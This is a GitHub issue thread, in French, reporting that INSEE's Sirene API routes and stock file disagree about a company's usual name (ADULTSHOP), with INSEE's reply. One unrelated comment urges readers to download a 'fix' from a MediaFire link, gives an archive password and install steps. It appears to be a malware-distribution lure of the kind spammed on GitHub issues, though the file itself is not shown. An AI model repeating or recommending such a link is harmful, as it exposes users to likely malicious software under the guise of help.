### ISSUE TITLE
DénominationUsuelleUniteLegale le cas Adultshop

### ISSUE THREAD

**Issue by XavierJp** [annuaire-entreprises-data-gouv-fr/site#1197]
## Reproduction du problème 

401224902
https://annuaire-entreprises.data.gouv.fr/entreprise/celine-attias-conseil-adultshop-401224902

Sur [sirene.fr](https://github.com/orgs/annuaire-entreprises-data-gouv-fr/projects/1/views/sirene.fr) la denomination apparait comme nulle
https://sirene.fr/sirene/public/recherche

Mais dans l’API sirene et les stocks, des incohérences :

Dans la route https://api.insee.fr/entreprises/sirene/V3.11/siret/40122490200023
L’objet unité légale contient le champ "denominationUsuelle1UniteLegale": null

Mais la route https://api.insee.fr/entreprises/sirene/V3.11/siren/401224902 indique dans les variables historisées : "denominationUsuelle1UniteLegale": "ADULTSHOP",

Et dans le fichier StockUniteLegale, publié sur [data.gouv.fr](https://github.com/orgs/annuaire-entreprises-data-gouv-fr/projects/1/views/data.gouv.fr), on retrouve la mention ADULTSHOP.

Mail envoyé a l'INSEE pour suivi

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by XavierJp** [comment]
Réponse de l'Insee, problème dans la route siren, mieux vaut utiliser la route /siret :/
